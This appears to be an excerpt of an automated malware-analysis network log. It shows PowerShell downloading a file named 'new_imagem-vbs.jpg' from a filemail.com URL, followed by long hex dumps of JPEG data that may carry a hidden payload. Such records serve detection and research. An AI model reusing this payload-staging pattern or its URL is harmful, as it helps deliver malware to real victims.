                                                                                                                                                                                2024-11-25 13:07:01 UTC3715INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d
                                                                                                                                                                                Data Ascii: Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb
                                                                                                                                                                                Data Ascii: wH?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1
                                                                                                                                                                                Data Ascii: =./ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d
                                                                                                                                                                                Data Ascii: pEaU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'z`y
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b
                                                                                                                                                                                Data Ascii: hCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea
                                                                                                                                                                                Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93
                                                                                                                                                                                Data Ascii: Ae[RTU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVI
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef
                                                                                                                                                                                Data Ascii: @z(4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0
                                                                                                                                                                                Data Ascii: "]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.2249172193.30.119.2054433964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:07:16 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                                                                                                                                Host: 3105.filemail.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:07:17 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Length: 2230233
                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                                                                                                                                X-Transfer-ID: ibybhsntnwgamsn
                                                                                                                                                                                Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:07:15 GMT
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2024-11-25 13:07:17 UTC3001INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: a1 5f 3c 0d 4d 46 b0 24 43 7b 80 01 ea 73 28 78 e4 72 6a 44 11 48 b2 b3 70 42 9e 83 16 f1 5d 24 be 21 a6 68 23 72 9b bd 25 be 1e f9 e5 fc 03 ec d2 68 fc 6e 67 3a a6 90 44 05 1e 39 27 eb 81 f4 74 f1 9d 36 8e 19 1e 59 f6 2c 5c 32 f7 51 99 7e 1d f6 df c2 bc 5b 53 ad d0 ac 8e 62 da 0e f7 6e 0d 02 78 bc cf d6 fd 9d 4d 54 6e e2 66 a9 8b 09 4e de 4d f4 03 3c fc ff 00 65 22 d2 6b db 4f 18 68 e2 70 bb 19 07 c3 9b c0 fa 97 d9 af 16 1a df 05 11 46 ca c9 11 0a ac bd 36 d6 63 7d a4 5d 48 70 c9 a8 f2 a3 bf 4a fb 9b ce fb 3b a4 5f 04 f0 8f bb c3 36 e0 a0 6e dd d6 f9 ff 00 a6 53 c4 e3 d6 78 a6 b2 07 81 f6 24 16 ce 0f 43 64 60 5f 41 f6 92 2d 1a c3 a4 d4 ea 17 cd 93 a7 04 96 c7 ce b8 89 24 26 41 b5 bd 41 4f 53 9e 76 5f 0d 09 e2 c3 58 f3 31 91 7a 23 00 40 c7 4c 7e 74 8b 21
                                                                                                                                                                                Data Ascii: _<MF$C{s(xrjDHpB]$!h#r%hng:D9't6Y,\2Q~[SbnxMTnfNM<e"kOhpF6c}]HpJ;_6nSx$Cd`_A-$&AAOSv_X1z#@L~t!
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a 5f 11 d4 84 04 02 4b 75 e3 91 ed 81 a1 a2 fb 43 18 3e 5e b2 44 0f c8 de 08 02 fe 20 74 cd 5d 3c cb aa 09 24 1a 94 96 31 7b b6 f3 67 da f3 e7 a3 4d ea dd 5b b7 77 f6 c7
                                                                                                                                                                                Data Ascii: $]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE_KuC>^D t]<$1{gM[w
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab
                                                                                                                                                                                Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: 89 39 4a ce ac ea c0 ea c2 a3 aa ad 15 04 fc 70 55 92 05 91 ce 07 a1 d0 ea 74 e9 a6 8c 81 44 9f 50 f8 e0 b5 9a 89 16 70 a0 1f 28 35 9a f6 cc d3 a6 6a 57 8d 89 8d 8f 5e 94 71 c8 e7 af 4b 00 6c ed 07 df e3 81 a2 d6 86 77 5a dd 60 00 7b 70 3f be 0e 29 95 aa b9 3d c7 62 71 68 5e 49 9e 43 74 a5 e9 81 f9 0f ed 8f c7 0a aa b0 08 b7 c7 3f 5c 03 34 c5 15 6d 80 2c 28 55 71 88 6a 18 92 0a 9a e4 ad f3 c7 be 19 d4 2a 31 35 c7 42 39 c5 a5 2f e5 90 29 81 e7 af c7 00 61 51 66 1b 3d 4c dc 67 34 6f 12 92 ea 55 98 af 03 2f 1e 9d d5 03 8a 53 57 95 06 49 25 8d 64 62 7d 5c 93 d8 0c 07 74 8e 0e 94 48 49 24 12 79 ef ea 38 06 d4 39 0c 01 21 98 0e 7e 3e d8 14 73 03 72 0d 28 35 f1 e4 ff 00 7c 90 43 83 29 6a 17 d3 e3 80 78 f5 4e b0 b2 48 58 12 3a d7 53 81 4d 43 ce cf 11 27 69 ae d9
                                                                                                                                                                                Data Ascii: 9JpUtDPp(5jW^qKlwZ`{p?)=bqh^ICt?\4m,(Uqj*15B9/)aQf=Lg4oU/SWI%db}\tHI$y89!~>sr(5|C)jxNHX:SMC'i
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: 5d 76 a8 da 4b 06 5d cd ff 00 17 1f 96 7c dd 11 9f 50 bb 49 da 09 1c 0b be 7d f0 1e 7d 4c 8c 9b 8a 00 ac 38 b6 e3 f9 62 6f 23 91 b4 c7 1f 1d 0e ef ff 00 47 1c 9d 55 53 60 16 2e be 39 9e 62 7d d4 16 c0 6a bd dc 8f a6 05 c4 fe 4a ee 28 81 8f 40 1b af e9 91 f7 a7 66 e1 17 a1 dc 37 7c 3e 59 8e f1 6a 25 97 7c 96 58 30 02 fe bf db 36 62 84 d6 ed b4 48 b3 80 9e b9 99 a0 42 51 40 dd d9 af b7 cb 2d 0c 65 b4 d0 06 1c 87 46 ff 00 7b fd 0b c9 d4 40 f2 46 2d 76 86 60 4f c8 03 fd 32 b1 ef 56 47 2b 6a a4 30 07 d8 96 5e 3f 31 81 a4 24 01 08 36 c0 55 11 dc 62 73 ea 9d 22 66 8d 79 52 a0 06 17 c5 1e bf 96 32 29 95 1b a1 04 8a c0 4b 0f 9a f2 36 c2 aa 4a df b9 ab c0 58 78 94 e9 22 79 94 df e2 01 7d f1 bf 12 24 e9 48 53 64 38 fa 58 c1 e9 f4 28 f2 3e a2 54 65 22 8a 83 85 d6 45
                                                                                                                                                                                Data Ascii: ]vK]|PI}}L8bo#GUS`.9b}jJ(@f7|>Yj%|X06bHBQ@-eF{@F-v`O2VG+j0^?1$6Ubs"fyR2)K6JXx"y}$HSd8X(>Te"E
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: 1f 0a d2 bb 34 3a 18 99 8d 73 20 2f cf fc 44 9c be aa 57 d4 a3 04 d3 4e ea 19 54 b2 b9 8b 8d f4 d4 41 04 50 5d de cc 3a 5e 66 4d f6 a6 37 f4 45 36 81 24 bb 0c de 6b ee 51 c7 40 82 be 99 1a bd 7e bb fd 89 a5 d4 e9 bc 4e 28 a6 9a 52 86 41 01 64 60 4b 52 85 d8 cd c5 57 4f e1 38 0e cd f6 67 c2 67 63 24 ba 67 92 43 c9 66 99 d8 92 3e 25 af 09 a9 f0 9d 04 de 1c 9a 29 34 ea 20 8c 05 8d 43 15 a1 d7 a8 e4 82 68 91 dc 80 79 cc ad 47 89 eb 4c 5a 78 b4 fe 33 e1 b1 ea 34 ec 53 54 67 6f 2c 3b 83 ca ed 2a 78 f8 a9 03 db 01 3e bd 7c 42 e3 f1 2f 16 f0 f8 a3 52 8c 1b 49 3a 92 19 58 b7 46 53 c7 e1 ef fc 3f 1c 0f 49 e1 b1 18 fc 32 0d 3e a5 23 91 84 2b 13 85 03 6b 1d a0 1a 15 c7 fe f9 e5 75 1e 1d e0 fa 2f b4 4d a3 8b c3 94 c7 32 83 b3 73 10 00 00 f0 6e c0 e6 f8 ac d1 d4 78 be
                                                                                                                                                                                Data Ascii: 4:s /DWNTAP]:^fM7E6$kQ@~N(RAd`KRWO8ggc$gCf>%)4 ChyGLZx34STgo,;*x>|B/RI:XFS?I2>#+ku/M2snx
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: cc 5f 93 f1 e8 71 32 83 d4 ce 83 71 24 d0 1f 2c 13 35 50 28 28 74 03 fa e0 3b 0c e5 4f a9 81 be a0 65 43 87 72 c4 f2 3a 62 65 eb 80 83 e9 87 d3 a9 2d b9 94 d5 56 06 da b0 6d 3c 6b bd 4d 72 72 16 91 8b 36 d0 6e fe 58 b3 a0 58 95 a3 8d 85 75 17 d7 2c 26 77 8f 98 c0 f9 e0 0b 57 21 69 89 05 5a cd 50 ed 88 15 dc 4d f0 45 90 6b 1e 54 55 98 12 a0 9b b2 32 35 45 3c e1 49 56 39 fc f0 3d f3 8d e9 bd 0b 51 ea 31 37 76 8c 9d c6 b1 c7 7d 9e a1 df 12 72 5d 8b 16 e9 db 02 a6 67 61 60 52 9e 9f 1c 13 bb d1 25 b7 0c 38 65 3c 76 ed 94 64 56 3c 1a c0 54 35 c6 ca d7 c7 b6 2a d4 f1 80 8a 14 df 37 df 1d 75 40 78 1d 3a 9c 03 c4 bb 83 55 de 02 72 c4 c5 68 12 3d ef fa 65 22 d2 6d 73 23 a8 a4 e6 8f 73 db f5 ac d0 28 1c 81 b7 2e 62 42 04 63 f0 af 35 f1 ef 81 96 21 92 4b 32 48 a1 8b
                                                                                                                                                                                Data Ascii: _q2q$,5P((t;OeCr:be-Vm<kMrr6nXXu,&wW!iZPMEkTU25E<IV9=Q17v}r]ga`R%8e<vdV<T5*7u@x:Urh=e"ms#s(.bBc5!K2H
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: 21 6d ca fe 24 4b 96 34 59 b5 73 0e 17 b7 41 84 f1 28 74 fa 2f db 84 1e 58 61 1f fb 4b 46 ea b4 4b 53 08 9b b9 eb ce 53 f6 ad 13 b6 9b c2 75 bb 08 8e 6d 4f 88 d0 61 b5 95 86 a9 99 81 1f f1 0c 07 ff 00 69 ec b1 fd 8c fd 9f a9 be 7c 39 bd 43 df cb 80 ff 00 5c f9 cc 45 37 aa bb b1 2d c0 bc f7 ff 00 b5 22 cb f6 13 f6 78 c3 a1 f0 d3 ff 00 f4 a0 cf 97 44 ae ec 00 6e b8 1a ec 52 49 16 21 25 90 6c fc 32 20 85 b4 f3 06 df bb 83 c6 02 36 4d 3b 02 c7 73 77 3e d8 c4 6e 8f fb c0 db af e3 80 c1 91 6b 83 47 ae 02 55 4f 33 ce 1f 8c ff 00 17 be 2f ab 91 53 aa 6e 1f ef 56 2a fa 97 95 94 47 6b b7 e3 78 1a 13 e9 e3 99 e8 fa 4b 10 7f 4c e6 d3 20 d2 c8 96 4f 0a c0 0e cc 3f e8 71 58 a7 92 c9 97 d3 5d 5b df 0f 04 ea 75 e9 21 3e 96 a4 03 de f8 c0 87 89 55 11 f7 b0 24 53 5e 05 55
